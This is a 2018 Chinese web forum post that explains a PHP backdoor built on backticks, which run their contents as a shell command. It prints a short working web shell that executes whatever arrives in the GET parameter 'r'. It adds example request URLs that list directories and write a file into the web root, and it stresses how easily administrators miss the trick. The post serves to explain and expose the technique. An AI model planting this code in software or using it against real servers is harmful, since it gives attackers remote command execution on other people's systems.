设为首页
收藏本站
用户名
Email
自动登录
找回密码
密码
登录
立即注册
只需一步,快速开始
快捷导航
登录
注册
论坛首页
BBS
建站模版
微站设计
虚拟主机
企业邮箱
博客日志
Blog
搜索
搜索
搜索
热搜
长春
优惠
活动
做网站
本版
帖子
用户
本版
帖子
用户
请
登录
后使用快捷导航
没有帐号?
立即注册
道具
勋章
任务
留言板
设置
我的收藏
退出
时时商务社区
»
论坛首页
›
建站资源
›
建站技术
›
一个不易被发现的PHP后门代码解析
返回列表
查看:
212
|
回复:
0
一个不易被发现的PHP后门代码解析
[复制链接]
bewin83
当前离线
积分
7520
2500
主题
2513
帖子
7520
积分
论坛元老
论坛元老, 积分 7520, 距离下一级还需 9992479 积分
论坛元老, 积分 7520, 距离下一级还需 9992479 积分
积分
7520
发消息
电梯直达
楼主
发表于 2018-2-14 05:56:24
|
只看该作者
|
倒序浏览
|
阅读模式
偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。
伪装性很好,很容易被管理员忽略。
$selfNums = $_GET['r'];
if (isset($selfNums)){
echo `$selfNums`;
}
刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,
而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),
通过 echo `系统命令`; 可以达到 system(); 一样的效果
如果不信的朋友可以测试
http://127.0.0.1/t.php?r=dir
可以列出目录
http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php
我用 appserv 和虚拟主机已经测试成功。
您可能感兴趣的文章:
用php实现批量查询清除一句话后门的代码
一些 PHP 管理系统程序中的后门
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
超小PHP小马小结(方便查找后门的朋友)
php后门URL的防范
教你识别简单的免查杀PHP后门
分享到:
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
0
回复
使用道具
举报
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
用户反馈
客户端